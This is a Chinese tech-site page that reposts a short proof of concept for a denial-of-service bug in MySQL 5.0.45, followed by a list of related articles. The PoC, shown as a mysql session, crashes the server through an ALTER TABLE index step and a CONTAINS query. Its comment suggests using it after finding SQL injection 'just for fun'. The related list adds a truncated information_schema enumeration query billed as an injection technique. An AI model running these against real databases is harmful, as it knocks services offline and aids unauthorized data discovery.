mysql 5.0.45 (修改)拒绝服务漏洞
mysql 5.0.45 (修改)拒绝服务漏洞
/*
* MySQL <=6.0 possibly affected
* Kristian Erik Hermansen
* Credit: Joe Gallo
* You must have Alter permissions to exploit this bug!
* Scenario: You found SQL injection, but you want to punch backend server
* in the nuts just for fun. Start with the Alter TABLE statement on
* a table and field you know to exist. The first two SQL statements are
* simply to demostrate reproducibility...
*/
<snip>
mysql> Create TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected
mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
Empty set
mysql> Alter TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0
mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
ERROR 2013 : Lost connection to MySQL server during query
</snip>
相关推荐
-
最新MySQL数据库漏洞情况通报
近日,互联网上披露了关于MySQL数据库存在代码执行漏洞( CNNVD-201609-183 )的情况.由于MySQL数据库默认配置存在一定缺陷,导致攻击者可利用该漏洞对数据库配置文件进行篡改,进而以管理员权限执行任意代码,远程控制受影响服务器.目前,Oracle官方网站发布声明将于10月发布关键补丁更新信息. 一.漏洞简介 Oracle MySQL是美国甲骨文(Oracle)公司的一套开源的关系数据库管理系统. MySQL数据库中的配置文件(my.cnf)存在远程代码执行漏洞(漏洞编号:CNN
-
mysql5 注入漏洞
复制代码 代码如下: select concat_ws(0x2f,information_schema.tables.table_schema,`information_schema`.`COLUMNS`.table_name,`information_schema`.`COLUMNS`.column_name) from `information_schema`.`COLUMNS` left join information_schema.tables on `information_sche
-
mysql 5.0.45 (修改)拒绝服务漏洞
mysql 5.0.45 (修改)拒绝服务漏洞 /* * MySQL <=6.0 possibly affected * Kristian Erik Hermansen * Credit: Joe Gallo * You must have Alter permissions to exploit this bug! * Scenario: You found SQL injection, but you want to punch backend server * in the nuts ju
-
mysql5.7及mysql 8.0版本修改root密码的方法小结
mysql5.7版本: 方法1: 用SET PASSWORD命令 格式:mysql> set password for 用户名@localhost = password('新密码'); 例子:mysql> set password for root@localhost = password('123'); mysql5.7和mysql8.0以上都可以用 方法2:用mysqladmin 格式:mysqladmin -u用户名 -p password 新密码 例子:mysqladmin -uroo
-
mysql 8.0.12 安装配置方法并修改密码
本文记录了mysql 8.0.12 安装配置方法,供大家参考,具体内容如下 1.从官网下载MySQL for Windows:https://dev.mysql.com/downloads/mysql/ 2.安装在本机"D:mysql":解压zip文件后将解压得到的文件夹内的全部文件拷贝到D盘的mysql文件夹下即可. 3.创建mysql.ini文件,放在D:mysql文件下即可,文件内容为: [mysqld] # 设置3306端口 port=3306 # 设置mysql的安装目录 b
-
Windows10下mysql 8.0.19 winx64安装教程及修改初始密码
本文为大家分享了mysql 8.0.19 winx64安装教程,供大家参考,具体内容如下 1. 下载mysql-8.0.19-winx64 1.1 进入地址:https://dev.mysql.com/downloads/mysql/ 1.2 解压zip包,并将解压文件 mysql-8.0.19-winx64 文件放在想放的位置,比如 D 盘下,如图: 1.3 配置环境变量(目的是为了避免在CMD窗口下操作时反复切换路径) 在Path下添加 D:\mysql-8.0.19-winx64\bin
-
mysql 8.0 安装配置方法教程
一.安装mysql yum源 从官网http://dev.mysql.com/downloads/repo/yum/下载mysql最新的yum源的rpm安装包 wget http://repo.mysql.com//mysql57-community-release-el6-9.noarch.rpm 使用yum安装rpm包 yum install mysql57-community-release-el6-9.noarch.rpm 检测mysql yum源 yum repolist enable
-
使用JDBC连接Mysql 8.0.11出现了各种错误的解决
本想着自己安装数据库还是很熟悉了 没想到这次彻底被征服了 虽然以前装的都是Mysql 5.7 ,这次第一次安装Mysql 8.0.11,安装起来不费事,感觉还得心应手,但是 但是 就在用JDBC连接数据库和用jdbc.properties文件时出现了巨多的错误 ,一环扣一环,解决了一个 又生成一个 总结一下都有这些问题:(前提是在cmd下和可视化界面下正常使用) 1.检测连接引擎和数据库版本是否匹配 2.看了很多是要改密码 有两个属性很奇葩 some_user和user_host 一
-
mysql 8.0.13 安装配置方法图文教程
本文为大家分享了mysql 8.0.13 安装配置教程,供大家参考,具体内容如下 下载 下载地址 解压 解压之后没有my.ini文件(我的端口设置的3308),截图中是我增加的 [client] port = 3308 default-character-set = utf8 [mysqld] port = 3308 character_set_server = utf8 basedir=D:\MySQL\mysql-8.0.13-winx64 datadir=D:\MySQL\mysql-8.
-
MySQL 5.7.16 修改密码提示 ERROR 1054 (42S22): Unknown column ''password'' in ''field list''的原因
按照网上之前版本的操作,将my.ini中的skip-grant-tables注释去掉,然后在命令行中以mysql -u root -p可以直接进入,但是执行 mysql> update mysql.user set password=password('password') where user='root'; 会出现以下错误 mysql> ERROR 1054 (42S22): Unknown column 'password' in 'field list' 错误原因:mysql数据库下已
-
mac下安装mysql忘记密码的修改方法
一.mac下安装MySQL数据库 1.下载MySQL数据库 下载地址:访问MySQL的官网http://www.mysql.com/downloads/ ,进行下载. 进入MySQL的下载界面(http://www.mysql.com/downloads/mysql/) 下载x86,64bit的dmg文件:直接选择最下面的"No thanks,just take me to downloads!" 2.安装MySQL数据库 打开MySQL安装包后,点击安装主程序pkg文件. 3.启动M
-
mysql 5.1版本修改密码及远程登录mysql数据库的方法
mysql创建用户并授权: 格式:grant 权限 on 数据库名.表名 to 用户@登录主机 identified by "用户密码"; grant[英][grɑ:nt] 承认; 同意; 准许; 授予; 例1:允许mk用户从localhost登录 mysql> grant all on book.* to mk1@localhost identified by "123456"; #允许访问book数据库下的所有表, 只能访问book表,而且是同一个服务
随机推荐
- DB2编程序技巧 (九)
- 一篇文章让你彻底弄懂JS的事件冒泡和事件捕获
- Linux 下的五种 IO 模型详细介绍
- FrameLayout和Fragment处理Android应用UI布局实例
- PHP管理内存函数 memory_get_usage()使用介绍
- 在线竞拍系统的PHP实现框架(二)
- python计算书页码的统计数字问题实例
- set_include_path和get_include_path使用及注意事项
- GridView控件如何显示序号
- js正确获取元素样式详解
- JavaScript 判断判断某个对象是Object还是一个Array
- 在网站上应该用的30个jQuery插件整理
- 自己实现string的substring方法 人民币小写转大写,数字反转,正则优化
- Java连接操作Oracle数据库代码详解
- Android编程实现只显示图片一部分的方法
- js读取本地文件的实例
- 在Android Studio中Parcelable插件的简单使用教程
- Angular实现的简单定时器功能示例
- 通过Java代码技巧改善性能
- 易语言使用如果真命令判断编辑框内容是否正确的代码